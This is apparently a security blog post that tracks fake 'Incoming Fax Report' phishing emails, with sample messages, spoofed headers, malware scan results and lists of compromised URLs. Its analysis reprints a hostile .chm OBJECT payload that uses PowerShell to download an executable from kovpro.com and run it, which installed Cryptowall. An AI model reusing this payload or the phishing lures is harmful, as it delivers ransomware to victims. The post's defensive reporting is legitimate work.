Submit to DiggSubmit to FacebookSubmit to Google PlusSubmit to StumbleuponSubmit to Twitter

Email:

Fake incoming fax report email claims to be from a machine in your domain or from your email address.

Attached zip file contains exe virus or trojan horse. Some versions have a malware web link instead.

Mixed spoofing nacha.org and your domain.


Subject: Incoming Fax Report

 *************************
INCOMING FAX REPORT
*************************

Date/Time: Tuesday, 18.02.2015
Speed: 398bps
Connection time: 07:07
Page: 7
Resolution: Normal
Remote ID: 961-748-174485
Line number: 9
DTMF/DID:
Description: Internal only
*************************

FAX-invoice.chm (17)

Subject: INCOMING FAX REPORT : Remote ID: 665-366-6868

Subject: INCOMING FAX REPORT : Remote ID: 497-577-7743 .. (etc)

****************************
INCOMING FAX REPORT
****************************

Date/Time: 06/05/2013 05:33:11 CST
Speed: 81100 bps
Connection time: 07:07
Pages: 1
Resolution: Normal
Remote ID: 665-366-6868
Line number: 665-366-6868
DTMF/DID:
Description: Сonfidential - To All Employees .pdf

****************************

CONFIDENTIALITY NOTICE:
This electronic mail transmission and any attached
files contain information intended for the exclusive
use of the individual or entity to whom it is addressed
and may contain information blah blah blah
Thank You

IncomingFax.zip (136)

Subject: INCOMING FAX REPORT : Remote ID: 984-633-6856

*******************************************
INCOMING FAX REPORT
*******************************************

Date/Time: 11/26/2013 05:14:23 EST
Speed: 07165 bps
Connection time: 08:08
Pages: 0
Resolution: Normal
Remote ID: 343-848-6365
Line number: 343-848-6365
DTMF/DID:
Description: Сost sheet for first half of 2013.pdf

******************************************
IncomingFax.zip (13)

 

....
Remote ID: 984-633-6856
Line number: 984-633-6856
DTMF/DID:
Description: New Docs.pdf
....

Header samples:

Envelope from NACHA.org spoofing, header from your domain spoofing. Some versions spoofing aexp.com in envelope. This thing has been going for a while.

Received: from asy100.as192.sol.superonline.com [212.252.192.100]
X-Envelope-From: status-update @nacha.org
From: Xerox WorkCentre <Xerox.Device3 @[your domain]>
Subject: INCOMING FAX REPORT : Remote ID: 343-848-6365

Received: from p4300.mpm.edu [192.206.48.3]
X-Envelope-From: ach-status @nacha.org
From: Xerox WorkCentre <Xerox.Device0 @[my domain].com>

Received: from ...-cpennsylvania2.hfc.comcastbusiness.net [173.163.143.130]
X-Envelope-From: noreply @nacha.org
From: Xerox WorkCentre <Xerox.Device0 @[my domain].com>

Received: from 57.190-154-84.uio.satnet.net [190.154.84.57]
X-Envelope-From: no-reply @nacha.org
From: Xerox WorkCentre <Xerox.Device1 @[my domain].com>

Received: from ool-60390baa.static.optonline.net [96.57.11.170]
X-Envelope-From: no-reply @nacha.org
From: Xerox WorkCentre <Xerox.Device7 @[my domain].com>

Received: from ...nnsylvania2.hfc.comcastbusiness.net [173.163.143.130]
X-Envelope-From: no-reply @nacha.org
From: Xerox WorkCentre <Xerox.Device5 @[my domain].com>

Received: from poloniabank.com [65.219.238.34]
X-Envelope-From: no-reply @nacha.org
From: Xerox WorkCentre <Xerox.Device8 @[my domain].com>

Received: from [208.52.162.185]
X-Envelope-From: service @nacha.org
From: Xerox WorkCentre <Xerox.Device7 @[my domain].com>

Received: from rrcs-....nys.biz.rr.com [24.213.255.214]
X-Envelope-From: service @nacha.org
From: Xerox WorkCentre <Xerox.Device6 @[my domain].com>

Received: from ...70.bstnma.fios.verizon.net [98.110.147.170]
X-Envelope-From: ach-status @nacha.org
From: Xerox WorkCentre <Xerox.Device3 @[my domain].com>

Received: from 129.196.60.178.unassigned.mundo-r.com [178.60.196.129] X-Envelope-From: welcome @aexp.com From: "Xerox Workcentre" <Scan0 @[my domain]> Subject: INCOMING FAX REPORT : Remote ID: 556-988-5993

Received: from CT-PTR1.qns.it [31.221.41.181] X-Envelope-From: welcome @aexp.com From: "Xerox Workcentre" <Scan8 @sutc.com> Subject: INCOMING FAX REPORT : Remote ID: 344-786-9968

Malware

18 February 2015 

Attachment : malicious .chm file : FAX-invoice.chm 

This is kind-of neat. It turns out that in November 2014, @ithurricanept (on twitter) demonstrated that a .chm file could be used to launch something without warning. Surely then, almost 3 months later, there's no way this would still be a problem.

Picture of ithurricanept doing POC || gtfo inb4 malware lols.

But no. Here is a fully patched Windows 8.1 getting Cryptowall 3.0. Windows Defender noticed the downloaded executable, but was unable to prevent anything.

Picture of a Windows 8.1 box getting cryptowall thanks to .chm file.

The .chm file itself maintained a 0 detection rate for at least 8 hours. The current VT report is here.

Picture of the AV industry screaming I don't give a fuck with their windows down and their systems up.

The .chm file can be unzipped like a 7zip .7z file. It consists of html files, graphic files, and some binary files I don't want to ever deal with.

Picture of chm file unzipped.

In this case, doc.htm contains an object like :

<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1"
    value=",cmd,/c powershell (New-Object System.Net.WebClient).DownloadFile('http://kovpro.com/putty.exe','%TEMP%\natmasla2.exe');
    (New-Object -com Shell.Application).ShellExecute('%TEMP%\natmasla2.exe')">
 <PARAM name="Item2" value="273,1,1">
</OBJECT>

Which is why my target computer used powershell to download and execute kovpro.com/putty.exe

Downloaded executable  : putty.exe -> natmasla2.exe ( cryptowall 3.0 )

VirusTotal report 

AVG 		Win32/Cryptor
Ad-Aware Trojan.CryptoLocker.Z
Avira TR/Dropper.Gen
BitDefender Trojan.CryptoLocker.Z
DrWeb Trojan.Encoder.514
ESET-NOD32 a variant of Win32/Injector.BUUD
Emsisoft Trojan.CryptoLocker.Z (B)
F-Secure Trojan.CryptoLocker.Z
GData Trojan.CryptoLocker.Z

Developer metadata
Copyright Copyright (C) Distant 2001-2013
Publisher Excellent distant - www.Distant.com
Product Distant
File version 2.0.0.7
Description Affect transportation

Malwr.com report 

12 June 2014

VirusTotal report 

AntiVir 				TR/Small.RTD.1 
Avast Win32:Malware-gen
Commtouch W32/Trojan.WKVS-9339
ESET-NOD32 Win32/TrojanDownloader.Waski.A
Emsisoft Trojan-Downloader.Win32.Agent (A)
F-Prot W32/Trojan3.IRP
Ikarus Trojan-Spy.Agent
Malwarebytes Trojan.Agent
Symantec Downloader.Upatre
TrendMicro-HouseCall TROJ_GEN.F0D1H00FC14

Other submitted File names:
Important Chase Private Banking Forms.scr
file-7112128_scr
latf1_did11-881721-86461.scr
Scan-29918-2873611-31.scr

Created process:
C:\WINDOWS\system32\drwtsn32 -p 1960 -e 176 -g

Malwr.com report 

Starts servers listening on 0.0.0.0:0
Performs some HTTP requests
Steals private information from local Internet browsers
Installs itself for autorun at Windows startup

HTTP GETs:
avazoo.com /wp-content/uploads/2014/06/1206in.jpeg <-- binary data file, not a jpeg

Anubis report

23 January 2014

Scan_001_683-373-8395.zip containing Scan_001_23012014.exe | VirusTotal report | Malwr.com report | File-Analyzer.net report

November 2013

IncomingFax.zip containing IncomingFax.exe | VirusTotal report | Malwr report

September 2013

Incoming_FAX_0819.exe | VirusTotal report | Malwr report

June 2013

IncomingFax.zip containing IncomingFax.exe | VirusTotal report

Malicious Link Variation:

****************************************
INCOMING FAX REPORT
****************************************

Date/Time: 09/18/2013 04:23:54 EST
Speed: 16214 bps
Connection time: 01:04
Pages: 7
Resolution: Normal
Remote ID: 3548925226
Line number: 7
DTMF/DID:
Description: August Payroll

Click here to view the file online

******************************************

The click here link goes to a compromised website like:

oakadventures.com /chimeras /index.html
agoodlookingman.com.au /lattices /index.html
31837.vws.magma.ca /environmentally /index.html
agoodlookingman.com.au /sledded /index.html
arlisnap.arlisna.org /seeking /index.html
oakadventures.com /ramona /index.html
arlisnap.arlisna.org /mummifying /index.html
kaindustries.comcastbiz.net /plagiarism /index.html
31837.vws.magma.ca /rheostats /index.html
kaindustries.comcastbiz.net /trammeled /index.html
31837.vws.magma.ca /payne /index.html

Each site loads 3 or so javascript files from more compromised websites:

0068421.netsolhost.com /partisanship /poached.js
ade-data.com /exuded /midyear.js
fangstudios.com /macedonian /piles.jsWhich redirects to a malicious exploit like:
lesperancerenovations.com /topic /seconds-exist-foot.php

You may find an ofuscated javascript ball of crap that tests your java version, etc and gives you a malicious java applet. Or, some user-agents will get 301'ed someplace else to look benign.

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Wed, 18 Sep 2013 20:35:22 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 178
Location: http://msn.com

...which is what I got for Mac, iPad, and Android.

 All links reported to Google Safe Browsing / StopBadware.org. All malware binaries sent to Microsoft MPC and ClamAV.

If this was at least a little helpful, how about a +1, Like, or Tweet?

{jcomments on}